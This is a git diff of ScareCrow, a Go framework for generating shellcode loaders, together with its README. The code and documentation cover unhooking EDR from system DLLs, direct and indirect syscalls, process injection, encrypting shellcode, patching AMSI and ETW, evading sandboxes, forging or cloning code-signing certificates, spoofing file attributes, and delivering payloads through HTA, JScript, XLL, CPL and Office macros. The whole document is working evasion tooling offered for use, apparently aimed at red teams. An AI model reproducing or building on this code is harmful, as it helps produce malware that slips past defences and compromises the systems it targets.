Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["s"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["si"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["size"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["startupInfo"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["dll"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["error"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["x"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["PROCESS_ALL_ACCESS"] = PROCESS_ALL_ACCESS + Shellcode_Loader.Variables["WriteProcessMemory"] = WriteProcessMemory + Shellcode_Loader.Variables["MI"] = Cryptor.VarNumberLength(4, 9) + + if console == true { + + Shellcode_Loader.Variables["AllocatingMessage"] = "printDebug(\"[+] Allocating a RWX Section of the Process\")" + Shellcode_Loader.Variables["RtlCopyMemoryMessage"] = "printDebug(\"[+] Copying Shellcode to Memory with RtlCopyMemory\")" + Shellcode_Loader.Variables["VirtualProtectMessage"] = "printDebug(\"[+] Calling VirtualProtect to Change Memory to not Writeable\")" + Shellcode_Loader.Variables["GetCurrentThreadMessage"] = "printDebug(\"[+] Calling GetCurrentThread to get a Handle on the Current Process\")" + Shellcode_Loader.Variables["NtQueueApcThreadExMessage"] = "printDebug(\"[+] Calling NtQueueApcThreadEx API to Execute Shellcode\")" + Shellcode_Loader.Variables["SyscallMessage"] = "printDebug(\"[*] Calling the Shellcode Using a Syscall\")" + Shellcode_Loader.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Shellcode_Loader.Variables["DLLname"] + "+\" \")" + Shellcode_Loader.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Shellcode_Loader.Variables["Version"] + ")" + Shellcode_Loader.Variables["PPIDMessage"] = + `strpid := fmt.Sprint(` + Shellcode_Loader.Variables["pi"] + `.ProcessId) + printDebug("[*] Creating Remote Process: " + strpid) + printDebug("[*] Creating Handle to Remote Process")` + Shellcode_Loader.Variables["ModuleMessage"] = "printDebug(\"[*] Mapping Modules:\")" + Shellcode_Loader.Variables["addr"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["RemoteModuleEnumeration"] = + `` + Shellcode_Loader.Variables["addr"] + `:= fmt.Sprintf("%X", ` + Shellcode_Loader.Variables["MI"] + `.LpBaseOfDll) + printDebug("[+] " + ` + Shellcode_Loader.Variables["s"] + ` + "'s Base Address: " + ` + Shellcode_Loader.Variables["addr"] + `) + printDebug("[*] Reloading " + ` + Shellcode_Loader.Variables["s"] + ` + "'s .Text Field")` + Shellcode_Loader.Variables["RemoteModuleMessage"] = "printDebug(\"[+] Reloaded and unhooked EDR\")" + Shellcode_Loader.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")" + Shellcode_Loader.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")" + Shellcode_Loader.Variables["Injected"] = "printDebug(\"[+] Injected!\")" } else { - Binary.Variables["HEX_Import"] = `` - } + Shellcode_Loader.Variables["RemoteModuleEnumeration"] = "" + Shellcode_Loader.Variables["PPIDMessage"] = "" + Shellcode_Loader.Variables["ModuleMessage"] = "" + Shellcode_Loader.Variables["RemoteModuleMessage"] = "" + Shellcode_Loader.Variables["RemoteReloading"] = "" + Shellcode_Loader.Variables["Injecting"] = "" + Shellcode_Loader.Variables["Injected"] = "" + + Shellcode_Loader.Variables["AllocatingMessage"] = "" + Shellcode_Loader.Variables["RtlCopyMemoryMessage"] = "" + Shellcode_Loader.Variables["VirtualProtectMessage"] = "" + Shellcode_Loader.Variables["GetCurrentThreadMessage"] = "" + Shellcode_Loader.Variables["NtQueueApcThreadExMessage"] = "" + Shellcode_Loader.Variables["SyscallMessage"] = "" + } if ProcessInjection != "" { ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1) - Binary.Variables["processpath"] = ProcessInjection + Shellcode_Loader.Variables["processpath"] = ProcessInjection - Binary.Variables["offset"] = Cryptor.VarNumberLength(4, 9) - Binary.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) + Shellcode_Loader.Variables["offset"] = Cryptor.VarNumberLength(4, 9) + Shellcode_Loader.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) Structure = Struct.Procces_Injection() - - } else { - Structure = Struct.Binary() } - - if Sleep == false { - Binary.Variables["SleepSecond"] = strconv.Itoa(Cryptor.GenerateNumer(2220, 2900)) - fmt.Println("[+] Sleep Timer set for " + Binary.Variables["SleepSecond"] + " milliseconds ") - } else { - Binary.Variables["SleepSecond"] = "0" + if Exec_Type == "VirtualAlloc" { + Structure = Struct.Syscall_Alloc() } - - BinaryTemplate, err := template.New("Binary").Parse(Structure) + if Exec_Type == "RtlCopy" { + Structure = Struct.Syscall_RtlCopy() + } + if Exec_Type == "NtQueueApcThreadEx" { + Structure = Struct.Syscall_NtQueueAPCThreadEx_Local() + } + Shellcode_LoaderTemplate, err := template.New("Shellcode_Loader").Parse(Structure) if err != nil { log.Fatal(err) } - if err := BinaryTemplate.Execute(&buffer, Binary); err != nil { + if err := Shellcode_LoaderTemplate.Execute(&buffer, Shellcode_Loader); err != nil { log.Fatal(err) } - return buffer.String(), Binary.Variables["FuncName"], Binary.Variables["NTFuncName"] -} + return buffer.String(), Shellcode_Loader.Variables["FunctionName"], Shellcode_Loader.Variables["raw_bin"] -func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName string, NTFuncName string) { +} +func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName string, NTFuncName string, encryptionmode string) { var buffer bytes.Buffer Shellcode := &Shellcode{} Shellcode.Variables = make(map[string]string) + var Structure string buffer.Reset() Shellcode.Variables["FuncName"] = FuncName Shellcode.Variables["fullciphertext"] = Cryptor.VarNumberLength(10, 19) @@ -849,6 +897,11 @@ func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName Shellcode.Variables["src"] = Cryptor.VarNumberLength(10, 19) Shellcode.Variables["unpadding"] = Cryptor.VarNumberLength(10, 19) + Shellcode.Variables["buff"] = Cryptor.VarNumberLength(10, 19) + Shellcode.Variables["buff2"] = Cryptor.VarNumberLength(10, 19) + Shellcode.Variables["clear"] = Cryptor.VarNumberLength(10, 19) + Shellcode.Variables["err"] = Cryptor.VarNumberLength(10, 19) + Shellcode.Variables["sysid"] = Cryptor.VarNumberLength(10, 19) Shellcode.Variables["processHandle"] = Cryptor.VarNumberLength(10, 19) Shellcode.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19) @@ -857,7 +910,17 @@ func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName Shellcode.Variables["oldprotect"] = Cryptor.VarNumberLength(10, 19) Shellcode.Variables["NtProtectVirtualMemoryprep"] = NTFuncName - ShellcodeTemplate, err := template.New("Shellcode").Parse(Struct.Decrypt_Function()) + if encryptionmode == "ELZMA" { + Structure = Struct.ELZMADecrypt_Function() + } + if encryptionmode == "AES" { + Structure = Struct.AESDecrypt_Function() + } + if encryptionmode == "RC4" { + Structure = Struct.RCFDecrypt_Function() + } + + ShellcodeTemplate, err := template.New("Shellcode").Parse(Structure) if err != nil { log.Fatal(err) } @@ -869,7 +932,7 @@ func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName } -func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, CommandLoader string) (string, string, string) { +func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, CommandLoader string) (string, string, string, string) { var LoaderTemplate string var buffer bytes.Buffer JScriptLoader := &JScriptLoader{} @@ -908,7 +971,7 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, } } if mode == "wscript" { - JScriptLoader.Variables["dllext"] = ".dll" + JScriptLoader.Variables["dllext"] = "." + Cryptor.VarNumberLength(10, 19) JScriptLoader.Variables["FileName"] = name JScriptLoader.Variables["DLLName"] = name JScriptLoader.Variables["manifest"] = Cryptor.VarNumberLength(10, 19) @@ -916,6 +979,7 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, JScriptLoader.Variables["Execute"] = Cryptor.VarNumberLength(10, 19) JScriptLoader.Variables["progid"] = Cryptor.VarNumberLength(10, 19) JScriptLoader.Variables["filename"] = name + LoaderTemplate = Struct.WS_JS() } buffer.Reset() @@ -928,11 +992,11 @@ func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, log.Fatal(err) } - return buffer.String(), JScriptLoader.Variables["fso"], JScriptLoader.Variables["dropPath"] + return buffer.String(), JScriptLoader.Variables["fso"], JScriptLoader.Variables["dropPath"], JScriptLoader.Variables["dllext"] } -func JScript_Buff(fso string, dropPath string, encoded string, code string, name string, mode string, sandbox bool) string { +func JScript_Buff(fso string, dropPath string, encoded string, code string, name string, mode string, sandbox bool, wsextension string) string { var buffer bytes.Buffer JScript := &JScript{} SandboxJScript := &SandboxJScript{} @@ -963,6 +1027,14 @@ func JScript_Buff(fso string, dropPath string, encoded string, code string, name JScript.Variables["Loader"] = code JScript.Variables["Magic1"] = Cryptor.VarNumberLength(10, 19) + JScript.Variables["rc4"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["decodeBase64"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["b4decoded"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["b4decodedkey"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["rc4key"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["rc4str"] = Cryptor.VarNumberLength(4, 9) + JScript.Variables["shellcode"] = Cryptor.VarNumberLength(4, 9) + if mode == "excel" { JScript.Variables["dllext"] = ".xll" JScript.Variables["FileName"] = name @@ -972,7 +1044,7 @@ func JScript_Buff(fso string, dropPath string, encoded string, code string, name JScript.Variables["FileName"] = name } if mode == "wscript" { - JScript.Variables["dllext"] = ".dll" + JScript.Variables["dllext"] = wsextension JScript.Variables["FileName"] = name } if mode == "msiexec" { @@ -1081,7 +1153,7 @@ func Macro_Buff(URL string, outFile string) { fmt.Println(buffer.String()) } -func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, refresher bool, console bool, sandbox bool, ETW bool, ProcessInjection string, sleep bool, AMSI bool) (string, string) { +func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, console bool, sandbox bool, ETW bool, ProcessInjection string, sleep bool, AMSI bool, export string, encryptionmode string, exectype string, evasion string) (string, string) { var code, FuncName, NTFuncName string name, filename := FileName(mode) if ETW == false { @@ -1094,11 +1166,8 @@ func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, fmt.Println("[+] Process Injection Mode Enabled") fmt.Println("[*] Created Process: " + ProcessInjection) } - if mode == "excel" || mode == "wscript" || mode == "control" || mode == "dll" || mode == "msiexec" { - code, FuncName, NTFuncName = DLLfile(b64ciphertext, b64key, b64iv, mode, refresher, name, sandbox, ETW, ProcessInjection, AMSI) - } else { - code, FuncName, NTFuncName = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection, sleep, AMSI) - } + Exec_Type := exectype + code, FuncName, NTFuncName = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection, sleep, AMSI, export, Exec_Type, evasion) os.MkdirAll(name, os.ModePerm) Utils.Writefile(name+"/"+name+".go", code) Utils.B64decode("loader.zip") @@ -1131,13 +1200,19 @@ func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, } os.Chdir(name) - Shellcode_Buff(b64ciphertext, b64key, b64iv, FuncName, NTFuncName) - Utils.ModuleObfuscator(name, FuncName) + Shellcode_Buff(b64ciphertext, b64key, b64iv, FuncName, NTFuncName, encryptionmode) + Utils.ModuleObfuscator(name, FuncName, encryptionmode) return name, filename } -func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool, Sha bool, path string) { +func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool, path string) { + if mode == "binary" { + Utils.GoEditor(name + ".exe") + } else { + Utils.GoEditor(name + ".dll") + } if mode == "excel" { os.Rename(name+".dll", name+".xll") + Utils.Sha256(name + ".xll") } else if mode == "control" { os.Rename(name+".dll", name+".cpl") if outFile == "" { @@ -1145,6 +1220,7 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co os.Rename(name+"/"+name+".cpl", name+".cpl") os.RemoveAll(name) fmt.Println("[+] " + name + ".cpl File Ready") + Utils.Sha256(name + ".cpl") if CommandLoader == "control" { outFile = name + ".cpl" Utils.Command(URL, CommandLoader, outFile) @@ -1156,8 +1232,10 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co } } else if mode == "wscript" { os.Rename(outFile+".dll", name+".dll") + Utils.Sha256(name + ".dll") } else if mode == "msiexec" { os.Rename(outFile+".dll", name+".dll") + Utils.Sha256(name + ".dll") } else if mode == "binary" { os.Chdir("..") os.Rename(name+"/"+name+".exe", name+".exe") @@ -1170,11 +1248,13 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co outFile = name + ".exe" Utils.Command(URL, CommandLoader, outFile) } + Utils.Sha256(name + ".exe") return } else if mode == "dll" { os.Chdir("..") os.Rename(name+"/"+name+".dll", name+".dll") os.RemoveAll(name) + Utils.Sha256(name + ".dll") fmt.Println("[+] DLL Compiled") fmt.Println("[!] Note: Loading a dll (with Rundll32 or Regsvr32) that has the same name as a valid system DLL will cause problems, in this case its best to change the name slightly") if path != "" { @@ -1183,21 +1263,20 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co return } fmt.Println("[*] Creating Loader") - code, fso, dropPath := JScriptLoader_Buff(name, filename, mode, sandbox, CommandLoader) + code, fso, dropPath, wsextension := JScriptLoader_Buff(name, filename, mode, sandbox, CommandLoader) f, _ := os.Open(filename) reader := bufio.NewReader(f) content, _ := ioutil.ReadAll(reader) encoded := base64.StdEncoding.EncodeToString(content) - finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox) + finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox, wsextension) + URL = Utils.Command(URL, CommandLoader, outFile) if CommandLoader == "hta" { var HTAtemplate string if mode == "wscript" { HTAtemplate = "HTA_WScript" finalcode = HTA_Buff(hex.EncodeToString([]byte(finalcode)), filename, HTAtemplate) - if Sha == true { - fmt.Println("[!] Note an additional file: " + filename + ".js will be dropped in the user's TEMP folder") - } + fmt.Println("[!] Note an additional file: " + filename + ".js will be dropped in the user's TEMP folder") } else { HTAtemplate = "HTA" finalcode = HTA_Buff(finalcode, filename, HTAtemplate) @@ -1209,12 +1288,10 @@ func CompileLoader(mode string, outFile string, filename string, name string, Co Utils.Writefile(outFile, finalcode) os.Chdir("..") os.Rename(name+"/"+outFile, outFile) - if Sha == true { - Utils.Sha256(outFile) - } os.RemoveAll(name) if path != "" { Utils.FileMover(outFile, path) } + Utils.Sha256(outFile) fmt.Println("[+] Loader Compiled") } diff --git a/README.md b/README.md index 4f581b4..185aa82 100644 --- a/README.md +++ b/README.md @@ -13,28 +13,50 @@ If you want to learn more about the techniques utilized in this framework please # ## Description -ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute. +ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. -When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. +ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute. + +ScareCrow uses 1 of 2 methods to unhook + +### Disk + +When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead it only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this, ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. + +To do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges. -To do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges. -Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid detection by non-userland, hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid detection by any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions. -ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption and initialization vector key. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLmain function which all DLLs typically need to operate. The DLL will still execute without any issue because the process we load into will look for those export functions and not worry about DLLMain being there. +#### Indirect Syscalls +ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by one of three encryption methods (outlined below). Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified, ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLMain function which all DLLs typically need to operate. The DLL will still execute without any issue because the process we load into will look for those export functions and not worry about DLLMain being there. ### Binary Sample

+ After

+### KnownDLLs + +KnownDLLs is a list of DLLs that are loaded by Windows during the system startup process. Because these DLLs are considered to be essential to the functioning of the operating system, they are cached to help reduce load times and improve performance when applications start up. KnownDLLs includes DLLs such as kernel32.dll, kernelbase.dll, and ntdll.dll. + +Utilizing these KnownDlls, ScareCrow maps a copy of the DLL from `\KnownDlls\` using a combination of NtOpenSection and NtMapViewOfSection to load it into the process's memory. ScareCrow doesn't load the entire DLL, rather it only loads in the .text section of the DLL (as this contains all the syscalls). From there ScareCrow use indirect Syscalls to call NtProtectVirtualMemory and change the permissions of the dll's .text memory section to allow Scarecrow to overwrite the EDR’s hooks before restoring permissions. + + +For more information you can read modexp's detailed [article]("https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/") + + +Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid detection by non-userland, hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid detection by any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions. During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things: -* Code signs the Loader: + Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist). ScareCrow creates these certificates by using a go package version of the tool `limelighter` to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option. +* ScareCrow also contains the ability to take the full chain and all attributes from a legitimate code-signing certificate from a file and copy it onto another file. This includes the signing date, counter signatures, and other measurable attributes. This option can use DLL or .exe files to copy using the `clone` command-line option, along with the path to the file you want to copy the certificate from. + + #### OpSec Consideration: - When signing the loader with microsoft.com, using them against WINDOWS DEFENDER ATP products may not be as effective as they can validate the cert as it belongs to them. If you are using a loader against a windows product possibly use a different domain. + When signing the loader with microsoft.com, using them against WINDOWS DEFENDER ATP products may not be as effective as they can validate the cert as it belongs to them. If you are using a loader against a windows product, possibly use a different domain. * Spoof the attributes of the loader: This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned. @@ -42,10 +64,16 @@ Files that are signed with code signing certificates are often put under less sc

+ With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed. +### Custom Attribute Files +While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name. + + + ## Requirements -ScareCrow now requires golang 1.16.1 or later to compile loaders. If you are running an older version please to version 1.16.1 or later. +ScareCrow now requires golang 1.19.1 or later to compile loaders. If you are running an older version, please use version 1.19.1 or later. See for new versions: https://golang.org/dl/. @@ -58,6 +86,9 @@ To install them, run following commands: go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo +go get github.com/Binject/debug/pe +go get github.com/awgh/rawreader + ``` Make sure that the following are installed on your OS: ``` @@ -71,7 +102,7 @@ Then build it ``` go build ScareCrow.go ``` -In addition ScareCrow utilizes [Garble](https://github.com/burrowers/garble) for obfuscating all loaders. +In addition, ScareCrow utilizes [Garble](https://github.com/burrowers/garble) for obfuscating all loaders. Note: Several of the dependencies do not play well on Windows when compiling, because of this it is recommended to compile your loaders on OSX or Linux. @@ -95,6 +126,17 @@ Note: Several of the dependencies do not play well on Windows when compiling, be Fear is a TEACHER. the first one you ever had.” Usage of ./ScareCrow: + -Evasion string + Sets the type of EDR unhooking technique: + [*] Disk - Retrives a clean version of the DLLs ".text" field from files stored on disk. + [*] KnownDLL - Retrives a clean version of the DLLs ".text" field from the KnownDLLs directory in the object namespace. + [*] None - The Loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls. (default "Disk") + -Exec string + Set the template to execute the shellcode: + [*] RtlCopy - Using RtlCopy to move the shellcode into the allocated address in the current running process by making a Syscall. + [*] ProcessInjection - Process Injection Mode. + [*] NtQueueApcThreadEx - Executes the shellcode by creating an asynchronous procedure call (APC) to a target thread. + [*] VirtualAlloc - Allocates shellcode into the process using custom syscalls in the current running process (default "RtlCopy") -I string Path to the raw 64-bit shellcode. -Loader string @@ -107,6 +149,8 @@ Usage of ./ScareCrow: [*] wscript - Loads into WScript process using a JScript loader. (default "binary") -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. + -clone string + Path to the file containing the certificate you want to clone -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones. -console @@ -118,82 +162,113 @@ Usage of ./ScareCrow: [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel, and Wscript Loaders). -domain string The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) + -encryptionmode string + Sets the type of encryption to encrypt the shellcode: + [*] AES - Enables AES 256 encryption. + [*] ELZMA - Enables ELZMA encryption. + [*] RC4 - Enables RC4 encryption. (default "ELZMA") + -export string + For DLL Loaders Only - Specify an Export function for a loader to have. -injection string Enables Process Injection Mode and specify the path to the process to create/inject into (use \ for the path). -noamsi - Disables the AMSI patching that prevents AMSI BuffferScanner. + Disables the AMSI patching that prevents AMSI BufferScanner. -noetw Disables the ETW patching that prevents ETW events from being generated. -nosign Disables file signing, making -domain/-valid/-password parameters not required. -nosleep Disables the sleep delay before the loader unhooks and executes the shellcode. + -obfu + Enables Garbles Literal flag replaces golang libray strings with more complex variants, resolving to the same value at run-time. This creates a larger loader and times longer to compile -outpath string The path to put the final Payload/Loader once it's compiled. -password string The password for code signing cert. Required when -valid is used. -sandbox Enables sandbox evasion using IsDomainJoined calls. - -sha256 - Provides the SHA256 value of the loaders (This is useful for tracking) - -unmodified - When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default) -url string URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/) -valid string The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired. ``` ## Loader -The Loader determines the type of technique to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory: +The Loader determines the type of technique type used to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory: * Control Panel – This generates a control panel applet (i.e. Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory. -* WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to load (not injected) DLL loader into its own process, side-by-side. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load. -* Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded. -* Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode. +* WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to load (not inject) the DLL loader into its own process, side-by-side. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load. +* Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded. +* Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode. -ScareCrow can also generate binary based payloads if needed by using the `-Loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation. +ScareCrow can also generate binary based payloads if needed by using the `-Loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation. ## Console -ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keep the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspiciousness and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional `-ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise. +ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keep the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspicious and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional `-ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise. If the `-console` command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing. -## Process Injection -ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to Write­Process­Memory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process. -This option can be used with any of the loader options. To enable process injection, use the `-injection` command-line option along with the full path to the process you want to use to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path. +## Execution Methods + +ScareCrow uses different templates to execute shellcode. To choose which template use the `-Exec` command-line option. These templates include: + +* RtlCopy +* NtQueueApcThreadEx +* VirtualAlloc +* ProcessInjection + +### Process Injection +ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, 